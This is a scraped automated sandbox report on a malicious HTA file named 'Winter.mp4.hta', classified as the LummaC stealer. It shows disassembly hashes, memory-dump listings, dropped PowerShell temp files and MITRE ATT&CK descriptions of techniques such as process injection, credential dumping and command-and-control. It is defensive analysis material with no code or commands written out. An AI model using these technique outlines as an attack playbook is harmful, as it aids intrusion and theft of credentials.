Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: MetricsSystem$DeleteObject
String ID:
API String ID: 4263548647-3916222277
Opcode ID: 27707b535d3b9e1ee7a7e2a0295577b41ecb54697afbbd9f5c54ce6729dc25ef
Instruction ID: a2b2c54bcb5a356ab8a6c3d975aeddd27c365e0b07893d1825a5cedf90510cd5
Opcode Fuzzy Hash: 27707b535d3b9e1ee7a7e2a0295577b41ecb54697afbbd9f5c54ce6729dc25ef
Instruction Fuzzy Hash: 6941D5B09143548FCB00EFA8E99465DBBF0FB58304F00592EE898DB394D774A948CF82

Function 0051C74D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0051C871

Strings

q, xrefs: 0051C891
*!_, xrefs: 0051C882

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: FreeLibrary
String ID: *!_$q
API String ID: 3664257935-1837099632
Opcode ID: f7365490623a465f137212d1d7d14d48feeed5697eeb6cd357218daf6d44b14a
Instruction ID: 4eaca48a77391e586a255488f1ab6a2de075439de86115c767ca98e4eb529368
Opcode Fuzzy Hash: f7365490623a465f137212d1d7d14d48feeed5697eeb6cd357218daf6d44b14a
Instruction Fuzzy Hash: FA41677050C381ABE3158B25985477BBFE1EFE2700F14491CF4C69B3D2DB7A88068B96

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Winter.mp4.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sozcbzi.are.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihzgs2yc.idp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scexr12o.sg5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpfltxf2.w1n.psm1

Static File Info

General

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
Winter.mp4.hta

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre